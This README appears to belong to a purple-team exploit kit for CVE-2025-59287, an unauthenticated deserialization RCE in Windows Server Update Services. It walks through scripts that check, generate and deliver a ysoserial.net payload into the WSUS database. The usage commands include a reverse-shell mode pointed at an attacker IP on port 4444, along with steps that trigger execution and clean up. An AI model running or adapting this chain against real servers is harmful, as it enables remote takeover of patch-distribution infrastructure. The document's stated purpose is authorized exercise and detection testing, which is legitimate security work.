
Purple team exercise scripts demonstrating CVE-2025-59287, an unauthenticated RCE in WSUS via malicious deserialization payload injection into the WSUS database.
Purple team exercise scripts for CVE-2025-59287, an unauthenticated remote code execution vulnerability in Windows Server Update Services (WSUS).
Authorized use only. For use in controlled exercise environments against systems you own or have explicit written permission to test.
The vulnerability abuses anonymously accessible WSUS SOAP endpoints to inject a malicious deserialization payload into the WSUS database. The payload executes when the WSUS administrative console is opened or a sync is triggered.
8530ysoserial\Release\ folder (see Setup)wsus-cve-2025-59287/
├── 1-check.ps1 # Verify target is vulnerable
├── 2-generate.ps1 # Generate serialized payload blob
├── 3-deliver.ps1 # Deliver payload to WSUS server
├── 4-verify.ps1 # Verify execution and clean up
├── ysoserial/ # Place ysoserial.net release here (not committed)
│ └── Release/
│ └── ysoserial.exe
└── README.md
Clone or download the repo. Add ysoserial.net so the path matches ysoserial\Release\ysoserial.exe.
Download ysoserial.net from: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 This will trigger Windows Defender by default
Run all scripts from the repo root.
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"
File drop (no listener needed, recommended first):
.\2-generate.ps1 -Mode filedrop
Reverse shell:
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"
On the WSUS server open the administrative console via Start > Windows Server Update Services, or trigger a sync via PowerShell:
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
Verify execution:
.\4-verify.ps1
Verify and clean up all artifacts:
.\4-verify.ps1 -Cleanup
From attack box via admin share:
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup
After cleanup remove the exercise computer from the WSUS console under Computers.